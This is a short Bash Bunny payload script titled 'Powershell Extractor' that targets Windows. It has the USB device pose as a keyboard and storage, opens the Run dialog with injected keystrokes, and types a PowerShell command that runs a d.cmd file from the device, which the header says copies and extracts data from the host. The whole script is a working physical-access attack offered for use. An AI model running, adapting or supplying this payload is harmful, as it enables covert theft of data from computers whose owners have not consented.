#!/bin/bash
#
# Title:         Powershell Extractor
# Author:        $irLurk$alot
# Version:       1.0
# Target:        Windows
# 
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn runs powershell script to copy move and extract data.

# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh

LED R 100
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
LED R B 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED R G B
